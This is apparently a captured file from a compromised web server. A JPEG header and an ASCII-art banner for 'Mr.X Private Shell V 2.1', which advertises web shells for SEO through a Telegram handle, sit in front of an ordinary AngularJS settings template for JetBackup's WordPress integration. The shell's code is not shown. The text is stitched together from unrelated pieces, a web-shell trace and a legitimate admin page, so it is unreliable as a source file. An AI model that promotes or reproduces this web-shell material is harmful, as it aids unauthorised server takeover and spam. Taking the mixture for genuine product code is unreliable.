����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<div ng-controller="extension" class="controller-box">
<h1>{{ lang.t("Wordpress Integration") }}</h1>
<p>
{{lang.t("The options below control whether the JetBackup WordPress plugin is installed and enabled for new or existing WordPress sites. JetBackup WP offers easy to use backup and restore functionality designed with WordPress end users in mind, and features the new ability to restore JetBackup 5 backups from the WP Admin interface for FREE. For more information, visit")}} <a href="https://www.jetbackup.com/jetbackup-for-wordpress/" target="_blank">https://www.jetbackup.com/jetbackup-for-wordpress/</a><br />
{{lang.t("Use our supported vendors to automate the installation process across your WordPress sites.")}}<br />
{{lang.t("If you're a partner, you can also enable automatic licensing for each installation using your partner token.")}}
</p>
<div class="x_panel">
<div class="x_content">
<form data-parsley-validate="" class="form-horizontal form-label-left" novalidate>
<fieldset ng-disabled="loading">
<div class="form-group">
<label class="control-label col-md-3 col-sm-3 col-xs-12">{{ lang.t("Enable New Installation Hooks") }}</label>
<div class="col-md-6 col-sm-6 col-xs-12">
<div class="pretty p-default p-curve p-smooth" ng-repeat="vendor in integrations">
<input type="checkbox" id="vendor{{vendor}}" ng-checked="isVendorEnabled(vendor)" ng-click="toggleVendor(vendor)" />
<div class="state p-primary"><label for="vendor{{vendor}}">{{vendor}}</label></div>
</div>
<p class="help-block">
{{ lang.t("You can choose which vendors to enable for automatic WordPress plugin deployment.") }}<br />
{{ lang.t("JetBackup will use the selected vendors to automate plugin installation on your WordPress sites.") }}
</p>
</div>
</div>
<div class="form-group">
<label class="control-label col-md-3 col-sm-3 col-xs-12" for="exclude_list">{{ lang.t("Sites to exclude") }}</label>
<div class="col-md-6 col-sm-6 col-xs-12">
<div class="input-group">
<input id="exclude_list" class="form-control" ng-model="excluderow" type="text" value="" />
<div class="input-group-btn">
<button type="button" class="btn btn-primary" ng-click="addListRow()">{{ lang.t("Add Site") }}</button>
<button type="button" class="btn btn-primary" ng-click="addMultiListRow()">{{ lang.t("Insert Multiple") }}</button>
</div>
</div>
<p class="help-block">
{{ lang.t("Add WordPress sites to exclude from automatic plugin installation.") }}<br />
{{ lang.t("Use full paths or patterns (e.g., my-site.com/wp, example[a-z].com/*).") }}<br />
{{ lang.t("These sites will be skipped during the automatic deployment process.") }}
</p>
<div class="include-btns">
<button type="button" ng-click="saveData.excludes.splice($index, 1)" class="btn btn-primary btn-xs" ng-repeat="exclude in saveData.excludes track by $index">
<em aria-hidden="true" class="fas fa-times"></em>
{{ exclude }}
</button>
</div>
</div>
</div>
<div class="form-group">
<label class="control-label col-md-3 col-sm-3 col-xs-12" for="partner_token">{{ lang.t("Partner Token") }}</label>
<div class="col-md-6 col-sm-6 col-xs-12">
<input id="partner_token" class="form-control" ng-model="saveData.partner_token" type="password" value="" />
<p class="help-block">
{{ lang.t("Enter your partner token to enable automated license activation.") }}<br />
{{ lang.t("This will allow each WordPress plugin installation to be licensed automatically under your partner account.") }}
</p>
</div>
</div>
<div class="form-group">
<label class="control-label col-md-3 col-sm-3 col-xs-12">{{ lang.t("Allow Socket API for All Users") }}</label>
<div class="col-md-6 col-sm-6 col-xs-12">
<a href="" ng-click="togglePermissions()" class="btn btn-primary">{{ permissions == 1 ? lang.t("Disable Socket API") : lang.t("Enable Socket API") }}</a>
<p class="help-block">
{{ lang.t("Current Status") }}: <span ng-class="{'text-success': permissions == 1, 'text-danger': permissions != 1 }">{{ permissions == 1 ? lang.t("Enabled") : lang.t("Disabled") }}</span><br />
{{ lang.t("Enable if you want to allow clients to restore from JetBackup backups from within Wordpress") }}
</p>
</div>
</div>
<div class="form-group">
<label class="control-label col-md-3 col-sm-3 col-xs-12">{{ lang.t("Deploy on all WordPress Sites Now") }}</label>
<div class="col-md-6 col-sm-6 col-xs-12">
<a href="" ng-click="massDeployment()" class="btn btn-primary">{{ lang.t("Mass deploy on all sites") }}</a>
<p class="help-block">
{{ lang.t("Deploy JetBackup for Wordpress extension on all Wordpress installations on this server") }}
</p>
</div>
</div>
<div class="ln_solid"></div>
<div class="form-group">
<div class="col-md-6 col-sm-6 col-xs-12 col-md-offset-3">
<button type="button" class="btn btn-primary" ng-click="saveChanges()" ng-disabled="saveing">{{ lang.t("Save") }}</button>
</div>
</div>
</fieldset>
</form>
</div>
</div>
</div>